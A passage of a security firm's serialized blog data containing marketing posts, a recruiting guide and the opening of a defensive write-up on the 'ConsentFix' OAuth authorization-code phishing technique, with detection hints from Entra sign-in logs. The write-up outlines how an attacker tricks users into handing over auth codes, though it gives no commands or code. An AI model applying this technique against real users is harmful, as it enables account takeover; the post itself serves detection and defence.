deployment, the Security Store helps defenders improve their security posture while focusing on what matters most.",[12,22071,22072],{},"The Microsoft Security Store is setting a new benchmark for cybersecurity procurement and deployment. By centralizing a wide range of security solutions and AI agents organizations can now streamline how they discover, acquire, and operationalize advanced security technologies. With features like industry framework alignment, simplified billing, and guided deployment, the Security Store helps security teams reduce complexity, accelerate adoption, and maximize the value of their security investment.",[41,22074,22076],{"id":22075},"learn-more-in-the-official-microsoft-blog","Learn more in the official Microsoft blog:",[12,22078,22079],{},[2672,22080,22083],{"href":22081,"rel":22082},"https://techcommunity.microsoft.com/blog/securitycopilotblog/agentic-security-your-way-build-your-own-security-copilot-agents/4454555",[2676],"Agentic Security Your Way: Build Your Own Security Copilot Agents",[41,22085,4982],{"id":4981},[12,22087,22088,22091,22092,22095],{},[251,22089,22090],{},"We Manage and Protect Microsoft Ecosystems at Scale","\nglueckkanja is a leading cloud managed service provider and top Microsoft partner, delivering secure, scalable, and fully ",[251,22093,22094],{},"cloud-native Microsoft environments."," With a unified blueprint approach and Infrastructure-as-Code methodology, glueckkanja enables enterprise customers to accelerate their digital transformation and cloud adoption. Securely, consistently, and at scale.",[12,22097,22098,22099,22102,22103,22106],{},"The company offers comprehensive managed services for ",[251,22100,22101],{},"Microsoft Azure, Microsoft Entra, and Microsoft Intune,"," helping organizations streamline identity and access management, modernize endpoint operations, and build compliant, Zero Trust-based infrastructures. These services are complemented by ",[251,22104,22105],{},"24/7 security operations"," and incident response capabilities via glueckkanja’s dedicated Cybersecurity Operations Center (SOC), ensuring continuous protection, threat mitigation, and alignment with the latest security standards.",[12,22108,22109,22110,22113,22114,2901,22116,22118,22119,22121,22122,22125],{},"To support a seamless and cloud-native Microsoft experience, glueckkanja has developed a suite of proprietary tools that simplify management and drive automation: ",[251,22111,22112],{},"KONNEKT"," for secure collaboration with Microsoft 365 data, ",[251,22115,4922],{},[251,22117,4845],{}," for passwordless, Intune-integrated network authentication, ",[251,22120,2677],{}," for scalable software distribution, and ",[251,22123,22124],{},"TerraProvider"," for fully automated provisioning of CloudPCs and hardware clients via Intune.",[12,22127,22128,22129,22132,22133,22136],{},"glueckkanja was among the first global partners to receive the ",[251,22130,22131],{},"Microsoft Verified MXDR"," certification, validating its excellence in managed security operations. With nearly 250 cloud professionals and a proven track record of success, glueckkanja has been recognized multiple times as a Microsoft Worldwide Partner of the Year finalist/winner, and ranks consistently at the top of the ",[251,22134,22135],{},"ISG Microsoft 365"," Germany quadrant since 2019.",[12,22138,22139,22140,22143],{},"The company is also a recognized innovatoramong Germany’s TOP 100 most innovative companies, and its ",[251,22141,22142],{},"outstanding 4.7/5 Kununu rating"," (Germany’s leading employer review platform) underlines its culture of excellence and employee satisfaction.",{"title":65,"searchDepth":111,"depth":111,"links":22145},[22146,22147,22148],{"id":22052,"depth":111,"text":22053},{"id":22075,"depth":111,"text":22076},{"id":4981,"depth":111,"text":4982},{"lang":2171,"seoTitle":22150,"titleClass":2173,"date":22151,"categories":22152,"blogtitlepic":22153,"socialimg":22154,"customExcerpt":22155,"keywords":22156,"maxContent":2168,"hreflang":22157,"quotes":22162,"contactInContent":22168,"footer":22188,"scripts":22189,"published":2181},"glueckkanja named Launch Partner for Microsoft Security Store, delivering 10 Copilot Agents","2025-09-30",[2176],"head-security-agents.jpg","/blog/heads/head-security-agents.jpg","glueckkanja is among the first partners in the Microsoft Security Store Preview, delivering 10 Microsoft-native Security Copilot Agents across Security, Entra, Intune, and Purview. Developed in close collaboration with customers, these agents are designed to address real-world security challenges from day one – fully integrated, enterprise-ready, and built to simplify and accelerate security operations.","Microsoft Security Store Preview, Security Copilot Agents, glueckkanja Microsoft partner, Microsoft-native security solutions, AI-powered cybersecurity tools, Entra security agents, Intune security automation, Purview compliance agents, Cloud security Microsoft Copilot, Simplify Microsoft Security operations",[22158,22160],{"lang":2260,"href":22159},"/de/posts/2025-09-30-security-store",{"lang":2263,"href":22161},"/es/posts/2025-09-30-security-store",{"items":22163},[22164],{"text":22165,"name":22166,"position":22167,"company":2971},"A Forensic Agent by glueckkanja AG delivers deep-dive analysis of Defender XDR incidents to accelerate investigations, while their Privileged Admin Watchdog Agent helps enforce zero standing privilege principles by getting rid of persistent admin identities. These innovations, along with their other 6 agents in the Security Store today, demonstrate how glueckkanja AG is empowering organizations to tackle a wide range of security and IT challenges.","Dorothy Li","Corporate Vice President, Security Copilot, Ecosystem and Marketplace",{"quote":2181,"infos":22169},{"bgColor":2201,"headline":2202,"subline":22170,"level":41,"textStyling":2204,"flush":2205,"person":22171,"form":22173},"Want to know how our 10 Microsoft-native Security Copilot Agents help simplify operations across Security, Entra, Intune, and Purview? Fill out the form, and we’ll share real-world insights, demos, and examples tailored to your needs.",{"image":2207,"cloudinary":2181,"alt":2208,"name":2209,"quotee":2209,"quoteeTitle":2210,"quote":22172},"What our customers gain is time and clarity: Security teams spend less effort on manual analysis and troubleshooting, and more time focusing on the threats that really matter. With our 10 Security Copilot Agents, we help them improve their security posture, reduce costs, and simplify daily operations directly within Microsoft Security.",{"ctaText":2213,"cta":22174,"method":2169,"action":2216,"fields":22175},{"skin":2215},[22176,22177,22178,22179,22180,22181,22182,22183,22185,22186,22187],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":8110,"type":2232,"id":2233,"required":2168,"requiredMsg":2234},{"label":8229,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2242,"value":2176},{"type":2241,"id":2244,"value":2245},{"type":2241,"id":2247,"value":22184},"Form: Blog Microsoft Security Store | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},{"type":2241,"id":2255},{"noMargin":2181},{"slick":2181},"/posts/2025-09-30-security-store",{"title":22046,"description":65},"posts/2025-09-30-security-store",[22194,22195,22196],"AI Agents","Security Copilot","Microsoft Security","rwfFTQ-KUG1pFwNFIR0n3PYQlXt_I_ov5W66hV1cIkY",{"id":22199,"title":22200,"author":22201,"body":22202,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":22330,"moment":2166,"navigation":2181,"path":22361,"seo":22362,"stem":22363,"tags":22364,"webcast":2168,"__hash__":22365},"content_en/posts/2025-10-07-prevent-cyber-attacks.md","Preventing Cyber Attacks: How Companies Build Resilience with IT Structures",[2461],{"type":9,"value":22203,"toc":22321},[22204,22206,22210,22212,22215,22218,22222,22224,22228,22230,22238,22241,22245,22247,22255,22258,22265,22269,22271,22278,22285,22289,22291,22298,22301,22305,22307,22310,22313],[22,22205],{},[41,22207,22209],{"id":22208},"why-cyber-attacks-succeed-so-frequently","Why cyber attacks succeed so frequently",[12,22211,31],{},[12,22213,22214],{},"Ransomware attacks are no coincidence. Attackers deliberately choose times when companies are understaffed — such as weekends. They exploit vulnerabilities like outdated authentication processes, unpatched systems, or misconfigured access points. A common mistake: the lack of a unified security concept. Instead of a well-thought-out overall strategy, many companies rely on isolated measures that are insufficient against complex attacks.",[12,22216,22217],{},"However, there are well proven approaches: a security model based on zero-trust principles, as well as clear structuring of access rights and automation to enable rapid response in case of emergency.",[41,22219,22221],{"id":22220},"three-pillars-for-a-robust-it-security-strategy","Three pillars for a robust IT security strategy",[12,22223,31],{},[41,22225,22227],{"id":22226},"secure-infrastructure-the-foundation-for-resilience","Secure Infrastructure – The foundation for resilience",[12,22229,47],{},[12,22231,22232,22233,22237],{},"A resilient IT infrastructure must not only function reliably but also actively close security gaps. In our example, 300 computers had to be isolated. The first step was therefore the complete reinstallation of a clean environment—based on our ",[2672,22234,22236],{"href":22235},"https://www.glueckkanja.com/en/azure/azure-foundation?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Azure Foundation",". This cloud infrastructure follows clear security guidelines and is rolled out in a standardized way using Infrastructure-as-Code (IaC). This allows security configurations to be automatically checked and updated according to best practices.",[12,22239,22240],{},"Another advantage: The use of zero-trust principles ensures that workloads are segmented and only released for authorized connections. This keeps the attack surface minimal.",[41,22242,22244],{"id":22243},"security-starts-with-authentication","Security starts with authentication",[12,22246,47],{},[12,22248,22249,22250,22254],{},"In almost every cyberattack, identity management is the first point of attack. Passwords only are no longer enough. With ",[2672,22251,22253],{"href":22252},"https://www.glueckkanja.com/en/modern-workplace/azure-active-directory?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Entra ID",", user accounts can be centrally managed and secured. Multi-factor authentication (MFA) is the standard.",[12,22256,22257],{},"Another advantage: Suspicious activities are automatically detected and reviewed. For example, if a user logs in again from another location within a few minutes, this is recognized as a potential threat and access is automatically blocked.",[12,22259,22260,22261,22264],{},"To detect attackers in the infrastructure, advanced systems such as Extended Detection and Response (XDR) and Security Information and Event Management (SIEM) are used. These solutions aggregate alarms and events, analyze them, and enable rapid assessment. A managed SOC—such as the ",[2672,22262,2913],{"href":22263},"https://www.glueckkanja.com/en/security/cloud-security-operations-center?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," from glueckkanja—helps to make optimal use of these technologies.",[41,22266,22268],{"id":22267},"restoring-workstations-quickly","Restoring workstations quickly",[12,22270,47],{},[12,22272,22273,22274,22277],{},"After an attack, employees need to be able to work again quickly. Cloud-based solutions like ",[2672,22275,3425],{"href":22276},"https://www.glueckkanja.com/en/modern-workplace/microsoft-intune?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," are essential for this. Devices can be fully reset and configured via a central portal—regardless of where the user is located.",[12,22279,22280,22281,22284],{},"The advantage: Employees can carry out the process themselves without the IT department having to manually set up each device. In addition, platforms like ",[2672,22282,2677],{"href":22283},"https://www.realmjoin.com/?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," automatically distribute all relevant software packages and ensure that security updates are installed.",[41,22286,22288],{"id":22287},"emergency-protection-azere-as-a-contingency-solution","Emergency protection: AzERE as a contingency solution",[12,22290,31],{},[12,22292,22293,22294,22297],{},"An incident like this shows how important it is to have an emergency strategy in place. ",[2672,22295,5754],{"href":22296},"https://www.glueckkanja.com/en/azure/azure-emergency-response-environment?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," (Azure Emergency Response Environment) provides an isolated environment in which critical systems such as the domain controller are replicated in a secure “Dark Tenant” instance. This enables access to a clean version of the data, even in the event of a large-scale attack.",[12,22299,22300],{},"Additionally, AzERE enables the setup of a digital “War Room”: a platform where all relevant stakeholders come together to coordinate actions in real time. This central communication capability can make the decisive difference when minutes determine success or failure.",[41,22302,22304],{"id":22303},"conclusion-proactive-resilience-instead-of-reacting-to-threats","Conclusion: Proactive resilience instead of reacting to threats",[12,22306,31],{},[12,22308,22309],{},"This incident shows: An effective security concept requires more than isolated solutions. It needs a combination of secure cloud infrastructure, robust identity management, and a modern work environment that can be quickly restored.",[12,22311,22312],{},"And that’s exactly why our IT Workaholics stories are about people whose IT operations we’ve brought back from crisis mode to normal operations.",[12,22314,22315,22316,22320],{},"Read ",[2672,22317,22319],{"href":22318},"https://www.glueckkanja.com/en/it-workaholics?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","IT Workaholics stories"," now!",{"title":65,"searchDepth":111,"depth":111,"links":22322},[22323,22324,22325,22326,22327,22328,22329],{"id":22208,"depth":111,"text":22209},{"id":22220,"depth":111,"text":22221},{"id":22226,"depth":111,"text":22227},{"id":22243,"depth":111,"text":22244},{"id":22267,"depth":111,"text":22268},{"id":22287,"depth":111,"text":22288},{"id":22303,"depth":111,"text":22304},{"lang":2171,"seoTitle":22200,"titleClass":2173,"date":22331,"categories":22332,"blogtitlepic":22333,"socialimg":22334,"customExcerpt":22335,"keywords":22336,"contactInContent":22337,"hreflang":22354,"footer":22359,"scripts":22360,"published":2181},"2025-10-07",[2176],"head-preventing-cyber-attacks","/blog/heads/head-preventing-cyber-attacks.png","Saturday morning, somewhere in Germany. While the weekend is just beginning for many, our team notices the first warning signs on a client company’s systems: unusual activities that immediately trigger all alarm bells. A quick analysis confirms the suspicion—ransomware. Within a very short time, critical systems are compromised. What follows is a race against time: securing systems, isolating critical areas, and then starting the recovery process.","Security, CSOC, Microsoft Security, Cyber Attacks, Prevention",{"quote":2181,"infos":22338},{"bgColor":2201,"headline":2202,"subline":22170,"level":41,"textStyling":2204,"flush":2205,"person":22339,"form":22340},{"image":2207,"cloudinary":2181,"alt":2208,"name":2209,"quotee":2209,"quoteeTitle":2210,"quote":22172},{"ctaText":2213,"cta":22341,"method":2169,"action":2216,"fields":22342},{"skin":2215},[22343,22344,22345,22346,22347,22348,22349,22350,22351,22352,22353],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":8110,"type":2232,"id":2233,"required":2168,"requiredMsg":2234},{"label":8229,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2242,"value":2176},{"type":2241,"id":2244,"value":2245},{"type":2241,"id":2247,"value":22184},{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},{"type":2241,"id":2255},[22355,22357],{"lang":2260,"href":22356},"/de/posts/2025-10-07-prevent-cyber-attacks.md",{"lang":2263,"href":22358},"/es/posts/2025-10-07-prevent-cyber-attacks.md",{"noMargin":2181},{"slick":2181},"/posts/2025-10-07-prevent-cyber-attacks",{"title":22200,"description":65},"posts/2025-10-07-prevent-cyber-attacks",[2176,3660],"wCZ9NX6OIdPjL8feOEl9GtkEECpk0-k7zrA1KWzfse4",{"id":22367,"title":22368,"author":22369,"body":22370,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":22448,"moment":22449,"navigation":2181,"path":22492,"seo":22493,"stem":22494,"tags":22495,"webcast":2168,"__hash__":22496},"content_en/posts/2025-11-12-partner-of-the-year-awards.md","Cloud-first at the airport: Microsoft Partner of the Year Awards 2025",[2461],{"type":9,"value":22371,"toc":22442},[22372,22376,22378,22381,22384,22388,22390,22393,22396,22410,22413,22417,22421,22423,22426,22430,22432,22435],[41,22373,22375],{"id":22374},"from-the-runway-to-the-cloud","From the runway to the cloud",[12,22377,31],{},[12,22379,22380],{},"Fraport operates 29 airports worldwide, including Frankfurt Airport, one of Europe's largest transportation hubs. More than 80,000 employees keep operations running every day, from baggage handling to IT security. To make all this work, you need a reliable, scalable, and secure digital infrastructure.",[12,22382,22383],{},"That's where the joint project between Fraport and glueckkanja came in: the existing VDI environment was to be replaced with a modern, cloud-based workplace architecture. The goal: more flexibility, less complexity, and a platform built for a globally connected organization.",[41,22385,22387],{"id":22386},"cloud-managed-workplace","Cloud Managed Workplace",[12,22389,31],{},[12,22391,22392],{},"At the core lies the combination of Windows 365 Cloud PCs and the Microsoft Intune Suite. Today, more than 16,500 endpoints are centrally deployed, managed, and secured.",[12,22394,22395],{},"The results:",[1254,22397,22398,22401,22404,22407],{},[1257,22399,22400],{},"Device provisioning in minutes instead of hours",[1257,22402,22403],{},"Automated processes for higher efficiency",[1257,22405,22406],{},"Transparent management and monitoring",[1257,22408,22409],{},"A Zero Trust security model across all devices",[12,22411,22412],{},"The outcome: a workplace concept that enables Fraport employees to work securely and flexibly across all locations, devices, and roles.",[5082,22414],{":quotes":22415,":no-fullscreen":3821,"spacing":22416},"quoteMicrosoft","mb-10",[41,22418,22420],{"id":22419},"recognition-for-innovation-and-collaboration","Recognition for innovation and collaboration",[12,22422,31],{},[12,22424,22425],{},"Each year, Microsoft honors partners who deliver outstanding cloud solutions, services, and innovations. In a global competition with more than 4,600 submissions, glueckkanja was recognized for the successful implementation of the Fraport project, a strong signal for the growing importance of cloud-based workplace solutions in critical infrastructures.",[41,22427,22429],{"id":22428},"a-blueprint-for-modern-workplace-architecture","A blueprint for modern workplace architecture",[12,22431,31],{},[12,22433,22434],{},"This project demonstrates how complex infrastructures can be reimagined through the cloud — without compromising on security or user experience. For Fraport, it marked the move to a standardized, cloud-based workplace model. For glueckkanja, it’s a proof point of how modern IT strategies can scale sustainably.",[12,22436,22437,22438,1013],{},"The full list of award-winning projects can be found ",[2672,22439,3116],{"href":22440,"rel":22441},"https://aka.ms/2025POTYAWinnersFinalists",[2676],{"title":65,"searchDepth":111,"depth":111,"links":22443},[22444,22445,22446,22447],{"id":22374,"depth":111,"text":22375},{"id":22386,"depth":111,"text":22387},{"id":22419,"depth":111,"text":22420},{"id":22428,"depth":111,"text":22429},{"lang":2171,"seoTitle":22368,"titleClass":2173,"date":22449,"categories":22450,"blogtitlepic":22451,"socialimg":22452,"customExcerpt":22453,"keywords":22454,"contactInContent":22455,"hreflang":22480,"scripts":22485,"quoteMicrosoft":22486},"2025-11-12",[2962],"head-partner-of-the-year-2025","/heads/head-partner-of-the-year-2025.jpg","Out of more than 4,600 nominations from over 100 countries, one project stood out as a showcase of what modern IT can look like: together with Fraport, glueckkanja was recognized at the Microsoft Partner of the Year Awards 2025 in the Cloud Endpoints category.","Microsoft Partner of the Year Awards 2025, Cloud Endpoints Award, glueckkanja Fraport, Fraport Microsoft Case Study, Windows 365 Cloud PC, Microsoft Intune Suite, Cloud Managed Workplace, Azure Cloud Migration, Zero Trust Security, Modern Workplace, Cloud-first strategy, Digital workplace transformation, Endpoint management, Device provisioning automation, Secure cloud infrastructure, Scalable IT architecture, Cloud governance and compliance, Enterprise mobility and security, Airport IT infrastructure, Aviation digital transformation, Critical infrastructure IT, Global operations, Remote workforce enablement, IT modernization in transportation, Cloud-based workplace for critical infrastructure, Microsoft Windows 365 and Intune in enterprise environments, Secure and scalable endpoint management, Transforming airport IT operations with Azure",{"quote":2181,"infos":22456},{"bgColor":2201,"color":5865,"boxBgColor":5864,"boxColor":5865,"headline":22457,"subline":22458,"level":41,"textStyling":2204,"flush":2205,"person":22459,"form":22465},"Get in Touch","Want to learn more about the project and our award? We'd be happy to show you how Fraport’s journey toward a standardized cloud architecture was brought to life.",{"image":5868,"cloudinary":2181,"alt":2420,"name":2420,"quotee":2420,"quoteeTitle":5869,"quote":22460,"detailsHeader":22461,"details":22462},"The project with Fraport shows how standardization and automation can enable a secure, scalable workplace model, exactly what's needed to run and evolve IT environments reliably over the long term.","We’re looking forward\u003Cbr />to hearing from you!",[22463,22464],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":2213,"cta":22466,"method":2169,"action":2216,"fields":22467},{"skin":2215},[22468,22469,22470,22471,22472,22473,22474,22475,22477,22478,22479],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":8110,"type":2232,"id":2233,"required":2168,"requiredMsg":2234},{"label":8229,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2242,"value":2962},{"type":2241,"id":2244,"value":2245},{"type":2241,"id":2247,"value":22476},"Form: Blog Microsoft Partner of the Year | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},{"type":2241,"id":2255},[22481,22483],{"lang":2260,"href":22482},"/de/posts/2025-11-12-partner-of-the-year-awards",{"lang":2263,"href":22484},"/es/posts/2025-11-12-partner-of-the-year-awards",{"slick":2181,"form":2181},{"items":22487},[22488],{"text":22489,"name":22490,"company":22491,"alt":22490},"By moving to Windows 365 Cloud PCs and the Intune Suite, we've achieved a new level of agility and security. The collaboration with glueckkanja has laid the foundation for future innovation.","Niklas Rast","Senior Solution Architect at Fraport","/posts/2025-11-12-partner-of-the-year-awards",{"title":22368,"description":65},"posts/2025-11-12-partner-of-the-year-awards",[2972,2973],"cj79PQ-BKLtgPV2RMZEjFxFqy0mJuIJu-kN6Q8BGdOA",{"id":22498,"title":22499,"author":22500,"body":22501,"cta":2166,"description":22505,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":22602,"moment":22603,"navigation":2181,"path":22615,"seo":22616,"stem":22617,"tags":22618,"webcast":2168,"__hash__":22619},"content_en/posts/2025-12-08-recruiting-process.md","Our Application Process Explained",[2551],{"type":9,"value":22502,"toc":22594},[22503,22506,22509,22512,22523,22527,22529,22532,22535,22539,22541,22544,22555,22558,22562,22564,22567,22571,22573,22576,22580,22582,22585,22589,22591],[12,22504,22505],{},"We're often asked: What do I need to bring and what's important to you?",[12,22507,22508],{},"What's important to us is that you're excited to work at an innovative tech company. We see ourselves as a team pulling in the same direction.",[12,22510,22511],{},"And we're looking for people who are as passionate about technology as we are:",[1254,22513,22514,22517,22520],{},[1257,22515,22516],{},"Who don't shy away from challenges but thrive when they can dive deep into complex topics.",[1257,22518,22519],{},"Who question the status quo and passionately develop new, innovative solutions – for glueckkanja and our clients.",[1257,22521,22522],{},"Who enjoy being part of a community, sharing their knowledge and learning from each other.",[186,22524,22526],{"id":22525},"step-1-your-application","Step 1: Your Application",[12,22528,31],{},[12,22530,22531],{},"You've submitted your documents – the first step is done! At our company, no AI reviews your application, but our recruiting team personally. Wondering who's behind the recruiting team? Here we are!",[12,22533,22534],{},"We - that's Kerstin, Anna, Steffi and Jan - take the time to carefully review your CV and check whether your experience and skills match our requirements. Our goal: You'll receive feedback from us within max. 1–2 weeks, but usually after just a few days. We know how nerve-wracking the waiting can be.",[186,22536,22538],{"id":22537},"step-2-getting-to-know-people-culture","Step 2: Getting to Know People & Culture",[12,22540,31],{},[12,22542,22543],{},"If your profile fits, we move to the first round. Don't worry – you don't need to be nervous! You've already made a great first impression with your CV. In the conversation, we want to get to know you as a person:",[1254,22545,22546,22549,22552],{},[1257,22547,22548],{},"Who are you?",[1257,22550,22551],{},"What makes you tick?",[1257,22553,22554],{},"What are you looking for in your future?",[12,22556,22557],{},"This is about an open, honest meeting at eye level.",[186,22559,22561],{"id":22560},"step-3-technical-exchange-with-your-future-lead","Step 3: Technical Exchange with Your Future Lead",[12,22563,31],{},[12,22565,22566],{},"In the second conversation, you'll meet your lead. Now it gets a bit more technical: We discuss your professional skills and you can ask all questions about tasks, team and projects. A bit of excitement is natural – but hey, you're already one step further!",[186,22568,22570],{"id":22569},"step-4-team-meet-culture-check","Step 4: Team Meet & Culture Check",[12,22572,31],{},[12,22574,22575],{},"At glueckkanja, culture is more than a word – it's our daily life. That's why in the last step you'll meet your potential team. We want to ensure it's a good fit for both sides – professionally and personally.",[186,22577,22579],{"id":22578},"finale-your-offer","Finale: Your Offer",[12,22581,31],{},[12,22583,22584],{},"Have you convinced us? Then comes the personal offer conversation. Here we clarify all details about the offer and answer all your final questions.",[186,22586,22588],{"id":22587},"why-so-many-steps","Why So Many Steps?",[12,22590,31],{},[12,22592,22593],{},"Simple: We want to ensure that you feel comfortable with us and that we're successful together. All conversations take place at eye level – and using first names is natural for us.",{"title":65,"searchDepth":111,"depth":111,"links":22595},[22596,22597,22598,22599,22600,22601],{"id":22525,"depth":329,"text":22526},{"id":22537,"depth":329,"text":22538},{"id":22560,"depth":329,"text":22561},{"id":22569,"depth":329,"text":22570},{"id":22578,"depth":329,"text":22579},{"id":22587,"depth":329,"text":22588},{"lang":2171,"seoTitle":22499,"titleClass":2173,"date":22603,"categories":22604,"blogtitlepic":22605,"socialimg":22606,"customExcerpt":22607,"keywords":22608,"hreflang":22609,"scripts":22614},"2025-12-08",[2962],"head-recruiting-process","/heads/head-recruiting-process.png","You've discovered an exciting position with us and want to apply? Great – we're always happy to welcome new talent! But what happens after you click 'Submit Application'? Here we give you a behind-the-scenes look.","Recruiting, Application Process, IT Company Jobs",[22610,22612],{"lang":2260,"href":22611},"/de/posts/2025-12-08-recruiting-process.md",{"lang":2263,"href":22613},"/es/posts/2025-12-08-recruiting-process.md",{"slick":2181,"form":2181},"/posts/2025-12-08-recruiting-process",{"title":22499,"description":22505},"posts/2025-12-08-recruiting-process",[3089,3090,3088],"G61hmPFZGmgTDCf7PALQe_EYxtkp8yqklHD0ejtE8AY",{"id":22621,"title":22622,"author":22623,"body":22624,"cta":2166,"description":22628,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":23405,"moment":23407,"navigation":2181,"path":23433,"seo":23434,"stem":23435,"tags":23436,"webcast":2168,"__hash__":23439},"content_en/posts/2025-12-31-vulnerability-consentfix.md","AuthCodeFix aka ConsentFix",[2494,2373,2530],{"type":9,"value":22625,"toc":23385},[22626,22629,22632,22635,22641,22644,22647,22656,22661,22669,22689,22692,22698,22701,22704,22710,22715,22719,22729,22735,22738,22741,22745,22748,22754,22761,22764,22784,22794,22798,22801,22804,22807,22810,22814,22817,22820,22837,22846,22850,22854,22874,22878,22882,22893,22896,22902,22906,22920,22924,22935,22939,22942,22950,22953,22961,22964,22972,22976,22979,23000,23003,23067,23070,23073,23076,23079,23082,23088,23091,23132,23136,23151,23155,23159,23173,23176,23179,23184,23187,23198,23202,23209,23213,23219,23224,23238,23244,23250,23256,23267,23270,23276,23279,23304,23312,23316,23336,23342,23345,23351,23355],[12,22627,22628],{},"As it is tradition right before the end of the year, a new vulnerability or clever attack vector appears, and Defenders are left trying to protect their users. Meanwhile, other attackers and red teamers watch closely and adapt.",[12,22630,22631],{},"This year, PushSecurity detected an attack that they named \"ConsentFix\", an evolution of the ClickFix attack that relies on the user to provide the attacker with a URI that basically hands over the key to the Entra kingdom. The method used in the wild relied on a manual copy and paste action by the user to work. Within a few days, John Hammond released a video demonstrating an improved version of the attack that no longer required copy and paste, instead, the user could simply drag and drop their auth code to the attacker.",[12,22633,22634],{},"When we look into the technical details of why this attack works and seemingly bypasses device compliance and other Conditional Access requirements, we find ourselves in the OAuth 2.0 authorization code flow.",[12,22636,22637],{},[2642,22638],{"alt":22639,"src":22640},"OAuth 2.0 authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-01.png",[12,22642,22643],{},"The attacker creates a Microsoft Entra login URI that targets the \"Microsoft Azure CLI\" client and the \"Azure Resource Manager\" resource, and opens this URI when the user visits the malicious website.",[12,22645,22646],{},"Mapped to the authorization code flow, this corresponds to the first step that a native public app such as the Azure CLI would normally call to authenticate the user. The application creates a listener on the machine on which it is executed, on a random high port. This port is used as a so called reply URI.",[12,22648,22649,22650,22655],{},"You can easily reproduce this yourself, for example by using ",[2672,22651,22654],{"href":22652,"rel":22653},"https://github.com/f-bader/TokenTacticsV2",[2676],"TokenTacticsV2",", or by crafting the URI manually.",[12,22657,22658],{},[2642,22659],{"alt":22654,"src":22660},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-02.png",[12,22662,22663,22664,22668],{},"After the user successfully signs into Entra ID, the user is redirected to the reply URI, e.g., ",[2672,22665,22666],{"href":22666,"rel":22667},"http://localhost:3001",[2676],". In a normal scenario, the Azure CLI would now accept the call to this URI and would receive the important and critical information that is part of the redirect:",[1254,22670,22671,22681],{},[1257,22672,22673,22675,22677,22678,22680],{},[251,22674,63],{},[531,22676],{},"\nThis is the authorization_code, which the application uses to request a bearer token, which consists of access, ID, and optionally the refresh token.",[531,22679],{},"\nAccording to the documentation, this code is valid for around 10 minutes and must be redeemed within this time.",[1257,22682,22683,22686,22688],{},[251,22684,22685],{},"state",[531,22687],{},"\nThis is an optional parameter, and the application should verify whether it is identical in the request and response.",[12,22690,22691],{},"In the attack scenario, the user is also redirected, but since no application is running on localhost, the browser encounters an error.",[12,22693,22694],{},[2642,22695],{"alt":22696,"src":22697},"The browser runs into an error","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-03.png",[12,22699,22700],{},"But the URI still contains the sensitive information and this is what the attacker wants the user to provide them. If the user obliges the attacker will now redeem the token material and can then use the access and refresh token to access the resource, in this case Azure Resource Manager.",[12,22702,22703],{},"In this screenshot you will see how to retrieve the bearer token using the URI provided by the user.",[12,22705,22706],{},[2642,22707],{"alt":22708,"src":22709},"Bearer token using the URI provided by the user","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-04.png",[2110,22711,22712],{},[12,22713,22714],{},"If you want to test your detections, make sure you execute the last step from a different system, in a different network.",[41,22716,22718],{"id":22717},"detection-artifacts","Detection artifacts",[12,22720,22721,22722,2901,22725,22728],{},"When you reproduce the attack and check the ",[63,22723,22724],{},"SigninLogs",[63,22726,22727],{},"AADNonInteractiveUserSignInLogs",", you'll see two events for this single sign-in activity. The first event represents the actual user sign-in, while the second originates from the attacker's infrastructure.",[12,22730,22731],{},[2642,22732],{"alt":22733,"src":22734},"Activity Log","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-05.png",[12,22736,22737],{},"The big difference is that the first event is an interactive sign in event, while the second is non-interactive. This translates to the two stages of the authentication flow: first the user, then the application or in our case the attacker.",[12,22739,22740],{},"Regular behavior of the Azure CLI would be that both sign-in events originate from the same IP address. However, in our case the IP addresses are different, and they originate from different countries. Of course, the latter is not a reliable indicator, as the attacker could reside in the same country as the victim to hide their tracks.",[186,22742,22744],{"id":22743},"missing-link","Missing link",[12,22746,22747],{},"When looking for a good way to link those two events, the natural first idea was to check the Unique Token Identifier (UTI). However, Microsoft uses different values for the authorization code UTI and the bearer token UTI, so this approach doesn't work as a reliable link.",[12,22749,22750],{},[2642,22751],{"alt":22752,"src":22753},"Unique Token Identifier","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-06.png",[12,22755,22756,22757,22760],{},"However, the ",[63,22758,22759],{},"SessionId"," is a good link between the two, though it is a long-running ID and might contain multiple of these event combinations, even legitimate ones.",[12,22762,22763],{},"With the additional knowledge of the auth code flow limitations and the user and application id as additional links you can use time as an important detection 